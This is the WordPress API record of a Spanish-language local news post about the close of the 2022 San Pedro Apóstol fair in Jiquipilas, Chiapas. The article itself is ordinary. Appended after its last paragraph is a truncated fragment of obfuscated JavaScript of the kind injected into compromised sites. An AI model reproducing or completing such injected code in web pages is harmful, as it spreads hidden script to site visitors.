{"id":3422,"date":"2022-07-04T03:08:38","date_gmt":"2022-07-04T03:08:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3422"},"modified":"2022-07-04T03:08:40","modified_gmt":"2022-07-04T03:08:40","slug":"con-gran-exito-culmina-la-feria-de-san-pedro-apostol-2022-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3422","title":{"rendered":"Con gran \u00e9xito culmina la feria de San Pedro Ap\u00f3stol 2022 en Jiquipilas."},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"666\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0022.jpg\" alt=\"\" class=\"wp-image-3423\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0022.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0022-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0022-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220703-WA0022-310x205.jpg 310w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>\u2022 Hugo L\u00e1zaro destac\u00f3 que fue una feria para el pueblo con eventos art\u00edsticos completamente gratis.<br>\u2022 Las y los visitantes , disfrutaron actividades religiosas, culturales, deportivas y musicales.<\/p>\n\n\n\n<p>03 de julio del 2022. Jiquipilas, Chiapas.- Cerrando con broche de oro la tradicional feria de San Pedro Ap\u00f3stol en su edici\u00f3n 2022, reactivado luego de dos a\u00f1os de ausencia por la pandemia covid-19, se di\u00f3 la clausura de este hecho hist\u00f3rico con antecedentes positivos para la sociedad.<\/p>\n\n\n\n<p>El edil Hugo L\u00e1zaro planific\u00f3 junto a muchas personas Jiquipiltecas, la ejecuci\u00f3n de esta feria que abarc\u00f3 diferentes actividades como religiosas, culturales, deportivas, entretenimiento, comercial y musical.<\/p>\n\n\n\n<p>Se di\u00f3 una proyecci\u00f3n \u00fanica y diferente con la instalaci\u00f3n del primer andador cultural Jiquipilteco, que narra la historia y demuestra a trav\u00e9s de emblemas naturales y culturales las riquezas del municipio.<\/p>\n\n\n\n<p>El d\u00eda mas esperado y con rotundo \u00e9xito, fue la presentaci\u00f3n estelar y por primera vez en tierra ropa caliente, el concierto de Alfredo Olivas, cantante mexicano de talla internacional y m\u00faltiple ganador de premios por su valiosa m\u00fasica, quien reuni\u00f3n a miles de personas locales, estatales y nacionales.<\/p>\n\n\n\n<p>Hugo L\u00e1zaro mencion\u00f3 que fue una agradable experiencia el poder aportar trabajo para lograr esta anhelada feria, la cual satisface diferentes necesidades en muchos sectores del municipio.<\/p>\n\n\n\n<p>Finaliz\u00f3 en que mantendr\u00e1 una visi\u00f3n \u00fanica y que lograr\u00e1 nuevos esquemas representativos en a\u00f1os venideros.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Hugo L\u00e1zaro destac\u00f3 que fue una feria para el pueblo con eventos art\u00edsticos completamente gratis.\u2022 Las y los visitantes , disfrutaron actividades religiosas, culturales, deportivas y musicales. 03 de julio del 2022. Jiquipilas, Chiapas.- Cerrando con broche de oro la tradicional feria de San Pedro Ap\u00f3stol en su edici\u00f3n 2022, reactivado luego de dos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3423,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3422","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3422"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3422\/revisions"}],"predecessor-version":[{"id":3424,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3422\/revisions\/3424"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3423"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}